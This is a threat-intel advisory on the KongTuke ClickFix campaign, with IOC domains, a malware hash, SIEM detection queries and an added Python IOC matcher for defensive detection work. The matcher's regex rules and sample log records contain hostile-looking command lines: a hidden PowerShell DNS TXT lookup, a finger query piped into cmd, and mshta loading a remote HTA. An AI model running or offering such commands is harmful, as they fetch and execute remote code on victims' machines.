KongTuke ClickFix Activity

    Date: 02/04/2026

    Severity: High

    Summary

    ClickFix campaigns rotate the commands they inject into the victim's clipboard. In late December 2025, the KongTuke campaign incorporated DNS TXT records into its ClickFix text. The campaign regularly shifts between ClickFix techniques, including the finger protocol and mshta. We will continue monitoring ClickFix activity for any renewed use of DNS TXT records.

    Indicators of Compromise (IOC) List

    Domains/URLs:

    https://emierich.com/2p2o.js

    https://emierich.com/js.php

    https://aacobson.com/3w3w.js

    https://aacobson.com/js.php

    payload.bruemald.top

    morasota.top

    hermisron.com

    app.frugesta.top

    https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037

    Hash (SHA-256):

    a82dd54090493c5efa75c9219b2f0749648741bb09b6a0e3a12c3f9d134fea53

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1:

    domainname like "https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037" or url like "https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037" or siteurl like "https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037" or domainname like "hermisron.com" or url like "hermisron.com" or siteurl like "hermisron.com" or domainname like "https://emierich.com/js.php" or url like "https://emierich.com/js.php" or siteurl like "https://emierich.com/js.php" or domainname like "app.frugesta.top" or url like "app.frugesta.top" or siteurl like "app.frugesta.top" or domainname like "https://aacobson.com/js.php" or url like "https://aacobson.com/js.php" or siteurl like "https://aacobson.com/js.php" or domainname like "https://aacobson.com/3w3w.js" or url like "https://aacobson.com/3w3w.js" or siteurl like "https://aacobson.com/3w3w.js" or domainname like "https://emierich.com/2p2o.js" or url like "https://emierich.com/2p2o.js" or siteurl like "https://emierich.com/2p2o.js" or domainname like "payload.bruemald.top" or url like "payload.bruemald.top" or siteurl like "payload.bruemald.top" or domainname like "morasota.top" or url like "morasota.top" or siteurl like "morasota.top"

    Detection Query 2:

    sha256hash IN ("a82dd54090493c5efa75c9219b2f0749648741bb09b6a0e3a12c3f9d134fea53")
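    As an added example (not code from Gurucul or from the Unit 42 reference), the following Python applies this advisory's IOCs to log records offline and adds command-line heuristics for the ClickFix command families the summary names (DNS TXT lookups, finger, mshta). The IOC values are the ones listed above; the log records and the regular expressions are assumptions constructed for the demonstration, not commands observed in the KongTuke campaign. Hosts are matched on parsed hostnames at label boundaries, so a lookalike such as nothermisron.com does not fire while a subdomain of a listed host does.

```python
"""Added example (not Gurucul's or Unit 42's code): an offline matcher that
applies the IOCs listed in this advisory to log records, plus command-line
heuristics for the ClickFix command families the summary names (DNS TXT
lookups, finger, mshta). The log records at the bottom are constructed for
the demonstration; the IOC values are the ones on the page."""
import hashlib
import re
from urllib.parse import urlparse

# IOCs exactly as listed in the advisory.
IOC_URLS = [
    "https://emierich.com/2p2o.js",
    "https://emierich.com/js.php",
    "https://aacobson.com/3w3w.js",
    "https://aacobson.com/js.php",
    "https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037",
]
IOC_HOSTS = {"payload.bruemald.top", "morasota.top", "hermisron.com", "app.frugesta.top"}
IOC_SHA256 = {"a82dd54090493c5efa75c9219b2f0749648741bb09b6a0e3a12c3f9d134fea53"}


def host_of(value):
    """Lowercase hostname of a URL or bare host; '' if none can be parsed."""
    v = value.strip().lower()
    if "://" not in v:
        v = "//" + v  # urlparse only fills netloc when a scheme separator is present
    return (urlparse(v).hostname or "").rstrip(".")


# Every URL IOC also contributes its host, so any path on that host is a hit.
IOC_HOSTSET = IOC_HOSTS | {host_of(u) for u in IOC_URLS}


def host_matches(host):
    """True for an exact IOC host or a subdomain of one. The comparison is on
    label boundaries, so 'nothermisron.com' is not a hit for 'hermisron.com'."""
    h = host.lower().rstrip(".")
    return any(h == ioc or h.endswith("." + ioc) for ioc in IOC_HOSTSET)


def url_matches(url):
    return host_matches(host_of(url))


def sha256_matches(hexdigest):
    return hexdigest.lower() in IOC_SHA256


def sha256_of(data: bytes):
    """Digest helper so the same hash check can be run over file contents."""
    return hashlib.sha256(data).hexdigest()


# Heuristic patterns for the ClickFix command families named in the summary.
# These are this example's assumptions about what such commands look like,
# not commands observed in the campaign; tune them to local telemetry.
CLICKFIX_PATTERNS = {
    "dns_txt_lookup": re.compile(r"\b(?:nslookup|resolve-dnsname)\b.*\btxt\b", re.I),
    "finger_protocol": re.compile(r"\bfinger(?:\.exe)?\s+\S*@\S+", re.I),
    "mshta_remote": re.compile(r"\bmshta(?:\.exe)?\s+[\"']?(?:https?:|vbscript:|javascript:)", re.I),
}


def classify_cmd(cmdline):
    """Return the set of heuristic names that fire on a process command line."""
    return {name for name, rx in CLICKFIX_PATTERNS.items() if rx.search(cmdline)}


def scan(records):
    """Apply IOC and heuristic checks to a list of log records.
    Returns a list of (record_index, reason) tuples in record order."""
    hits = []
    for i, rec in enumerate(records):
        if "url" in rec and url_matches(rec["url"]):
            hits.append((i, "ioc_url_host"))
        if "query" in rec and host_matches(rec["query"]):
            hits.append((i, "ioc_dns_query"))
        if "sha256" in rec and sha256_matches(rec["sha256"]):
            hits.append((i, "ioc_sha256"))
        for tag in sorted(classify_cmd(rec.get("cmd", ""))):
            hits.append((i, "clickfix_" + tag))
    return hits


# Constructed sample records (not real telemetry). Hostnames that are not on
# the IOC list use reserved example domains.
SAMPLE_RECORDS = [
    {"src": "proxy", "url": "https://emierich.com/2p2o.js"},         # hit: listed URL host
    {"src": "proxy", "url": "https://nothermisron.com/index.html"},  # no hit: lookalike
    {"src": "dns", "query": "cdn.hermisron.com"},                     # hit: subdomain of IOC
    {"src": "dns", "query": "frugesta.top"},                          # no hit: parent of IOC only
    {"src": "edr", "sha256": "A82DD54090493C5EFA75C9219B2F0749648741BB09B6A0E3A12C3F9D134FEA53"},
    {"src": "process", "cmd": 'powershell -w hidden -c "nslookup -type=txt lookup.example.com"'},
    {"src": "process", "cmd": "cmd /c finger ops@finger.example.com | cmd"},
    {"src": "process", "cmd": "mshta https://www.example.com/page.hta"},
    {"src": "process", "cmd": "notepad.exe C:\\Users\\me\\notes.txt"},  # no hit
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_RECORDS):
        print(f"record {idx}: {reason} -> {SAMPLE_RECORDS[idx]}")
```

    The hash check is case-insensitive because EDR products disagree on digest casing, and the hostname check derives a host from each URL IOC so a changed path or token on a listed host is still caught; a hit on the bare path-level IOC alone would miss those.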

    Reference:

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-02-03-IOCs-from-KongTuke-ClickFix-activity.txt


    Tags

    KongTuke, Threat Actor, ClickFix
